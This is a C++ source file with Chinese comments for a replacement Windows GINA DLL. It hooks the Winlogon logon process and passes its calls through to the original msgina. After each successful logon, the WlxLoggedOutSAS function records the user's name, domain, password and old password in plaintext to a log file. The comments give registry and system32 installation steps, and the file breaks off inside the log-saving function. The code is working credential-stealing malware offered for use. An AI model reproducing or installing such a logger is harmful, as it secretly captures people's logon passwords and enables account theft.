#define UNICODE
//#include <windows.h>
#include <afx.h> //为了调用MFC类
#include <Winwlx.h>
#include "main.h"
//将这个DLL拷到system32目录下,并在注册表中加入:
//\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
//加一个GinaDLL,类型RegSZ, 内容为你的dll名,如:'MyGina.dll'.
//重启机器,系统就会使用你的dll,GINA可以实现很多东西,值得研究!
//在启动到登陆界面时,系统(Winlogon.exe)会调用WlxLoggedOutSAS!
//注意:必须要用unicode。如果改了后启动不了,请将msgina.dll拷贝成你的dll,
//再启动!或者进入安全模式,删除掉那个键值。
HINSTANCE myHandle = NULL;//实例句柄
typedef struct {
HANDLE hWlx;
LPWSTR station;
PWLX_DISPATCH_VERSION_1_3 pWlxFuncs;
HANDLE hDllInstance;
HANDLE UserToken;
} GINA_CONTEXT, * PGINA_CONTEXT;
void WriteInfo(char * buf);//显示ASCII字符串信息
void WriteInfoW(PWSTR WideStr);//显示unicode字符串信息
void SaveLog(char* c,int num);//日志保存
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
switch (fdwReason){
case DLL_PROCESS_ATTACH:
WriteInfo("*********************stone start!***************\r\n");
myHandle = hinstDLL;//记录实例句柄,备用,本例没有用到。
if (LoadMsGina()) //加载MyGina
{
WriteInfo("Init gina ok... \r\n");
WriteInfo("\r\n");
}
else
{
WriteInfo("Init gina false ...\r\n");
WriteInfo("\r\n");
}
break;
case DLL_PROCESS_DETACH:
ReleaseMsGina();//释放MyGina
WriteInfo("release gina ok \r\n");
break;
}
return TRUE;
}
BOOL WINAPI
WlxActivateUserShell (
PVOID pWlxContext,
PWSTR pszDesktopName,
PWSTR pszMprLogonScript,
PVOID pEnvironment)
{
//WriteInfo("WlxActivateUserShell \r\n");
return prcWlxActivateUserShell (
pWlxContext,
pszDesktopName,
pszMprLogonScript,
pEnvironment);
}
VOID WINAPI WlxDisplaySASNotice (
PVOID pWlxContext)
{
//WriteInfo("WlxDisplaySASNotice \r\n");
prcWlxDisplaySASNotice(pWlxContext);
}
BOOL WINAPI WlxInitialize (
LPWSTR lpWinsta,
HANDLE hWlx,
PVOID pvReserved,
PVOID pWinlogonFunctions,
PVOID * pWlxContext)
{
//WriteInfo("WlxInitialize \r\n");
return prcWlxInitialize (
lpWinsta,
hWlx,
pvReserved,
pWinlogonFunctions,
pWlxContext);
}
int WINAPI WlxLoggedOnSAS (
PVOID pWlxContext,
DWORD dwSasType,
PVOID pReserved)
{
//WriteInfo("WlxLoggedOnSAS \r\n");
return prcWlxLoggedOnSAS (
pWlxContext,
dwSasType,
pReserved);
}
/********************************************************************/
//在启动到登陆界面时,系统(Winlogon.exe)会调用WlxLoggedOutSAS!
int WINAPI WlxLoggedOutSAS (
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSID pLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID * pProfile)
{
int iRet=0;
PWSTR pszUserName=NULL;
PWSTR pszDomain=NULL;
PWSTR pszPassword=NULL;
PWSTR pszOldPassword=NULL;
PSTR pLogonTime=new char[100];
//WriteInfo("WlxLoggedOutSAS \r\n");
iRet = prcWlxLoggedOutSAS(
pWlxContext,
dwSasType,
pAuthenticationId,
pLogonSid,
pdwOptions,
phToken,
pMprNotifyInfo,
pProfile);
if(iRet == WLX_SAS_ACTION_LOGON)
{
//Get logon time
CTime tm=CTime::GetCurrentTime();
::sprintf(pLogonTime,"%d_%d_%d %d:%d:%d \r\n",tm.GetYear(),tm.GetMonth(),tm.GetDay(),tm.GetHour(),tm.GetMinute(),tm.GetSecond());
if(pLogonTime!=NULL)
{
WriteInfo("logon_time: ");
WriteInfo(pLogonTime);
}
// copy pMprNotifyInfo and pLogonSid for later use
pszUserName=pMprNotifyInfo->pszUserName;
if(pszUserName!=NULL)
{
WriteInfo("Username : ");
WriteInfoW(pszUserName);
}
pszDomain=pMprNotifyInfo->pszDomain;
if(pszDomain!=NULL)
{
WriteInfo("Domain : ");
WriteInfoW(pszDomain);
}
pszPassword =pMprNotifyInfo->pszPassword;
if(pszPassword!=NULL)
{
WriteInfo("PassWord : ");
WriteInfoW(pszPassword);
}
pszOldPassword=pMprNotifyInfo->pszOldPassword;
if(pszOldPassword!=NULL)
{
WriteInfo("OldPassword: ");
WriteInfoW(pszOldPassword);
}
}
WriteInfo("\r\n");
return iRet;
}
/********************************************************************/
VOID WINAPI WlxLogoff (PVOID pWlxContext)
{
//WriteInfo("WlxLogoff \r\n");
prcWlxLogoff(pWlxContext);
}
BOOL WINAPI WlxNegotiate (
DWORD dwWinlogonVersion,
PDWORD pdwDllVersion)
{
//WriteInfo("WlxNegotiate \r\n");
return prcWlxNegotiate (
dwWinlogonVersion,
pdwDllVersion);
}
BOOL WINAPI WlxScreenSaverNotify (
PVOID pWlxContext,
BOOL *pSecure)
{
//WriteInfo("WlxScreenSaverNotify \r\n");
return prcWlxScreenSaverNotify (
pWlxContext,
pSecure);
}
VOID WINAPI WlxShutdown(
PVOID pWlxContext,
DWORD ShutdownType)
{
//WriteInfo("WlxShutdown \r\n");
prcWlxShutdown(pWlxContext, ShutdownType);
}
BOOL WINAPI WlxStartApplication (
PVOID pWlxContext,
PWSTR pszDesktopName,
PVOID pEnvironment,
PWSTR pszCmdLine)
{
//WriteInfo("WlxStartApplication \r\n");
return prcWlxStartApplication (
pWlxContext,
pszDesktopName,
pEnvironment,
pszCmdLine);
}
int WINAPI WlxWkstaLockedSAS (
PVOID pWlxContext,
DWORD dwSasType
)
{
//WriteInfo("WlxWkstaLockedSAS \r\n");
return prcWlxWkstaLockedSAS (
pWlxContext,
dwSasType
);
}
VOID WINAPI WlxDisplayLockedNotice(PVOID pWlxContext)
{
//WriteInfo("WlxDisplayLockedNotice \r\n");
prcWlxDisplayLockedNotice(pWlxContext);
}
BOOL WINAPI WlxDisplayStatusMessage(
PVOID pWlxContext,
HDESK hDesktop,
DWORD dwOptions,
PWSTR pTitle,
PWSTR pMessage
){
//WriteInfo("WlxDisplayStatusMessage \r\n");
return prcWlxDisplayStatusMessage(
pWlxContext,
hDesktop,
dwOptions,
pTitle,
pMessage
);
}
BOOL WINAPI WlxGetStatusMessage(
PVOID pWlxContext,
DWORD *pdwOptions,
PWSTR pMessage,
DWORD dwBufferSize
)
{
//WriteInfo("WlxGetStatusMessage \r\n");
return prcWlxGetStatusMessage(
pWlxContext,
pdwOptions,
pMessage,
dwBufferSize
);
}
BOOL WINAPI WlxIsLockOk(PVOID pWlxContext)
{
//WriteInfo("WlxIsLockOk \r\n");
return prcWlxIsLockOk(pWlxContext);
}
BOOL WINAPI WlxIsLogoffOk(
PVOID pWlxContext
)
{
//WriteInfo("WlxIsLogoffOk \r\n");
return prcWlxIsLogoffOk(
pWlxContext
);
}
BOOL WINAPI WlxNetworkProviderLoad(
PVOID pWlxContext,
PWLX_MPR_NOTIFY_INFO pNprNotifyInfo
)
{
//WriteInfo("WlxNetworkProviderLoad \r\n");
return prcWlxNetworkProviderLoad(
pWlxContext,
pNprNotifyInfo
);
}
BOOL WINAPI WlxRemoveStatusMessage(
PVOID pWlxContext
)
{
//WriteInfo("WlxRemoveStatusMessage \r\n");
return prcWlxRemoveStatusMessage(
pWlxContext
);
}
void WriteInfo(char * buf)//显示ASCII字符串信息
{
int i = 0;
while (TRUE)
{
if (!buf[i])
break;
else
i++;
}
i++;
SaveLog(buf,i);//日志保存
}
void WriteInfoW(PWSTR WideStr)//显示unicode字符串信息
{
//获取unicode字符串的字符个数
int nstrlen=WideCharToMultiByte(CP_ACP,0,WideStr,-1,
NULL,0,NULL,NULL);
//在进程堆中分配空间
PSTR tempStr=(PSTR)HeapAlloc(GetProcessHeap(),0,nstrlen);
if(tempStr==NULL) return ;
//把unicode字符串转换为ASCII字符串
WideCharToMultiByte(CP_ACP,0,WideStr,-1,
tempStr,nstrlen,NULL,NULL);
WriteInfo(tempStr);
WriteInfo("\r\n");
//释放堆空间
HeapFree(GetProcessHeap(),0,tempStr);
}
void SaveLog(char* c,int num) //日志保存函数
{
CString name;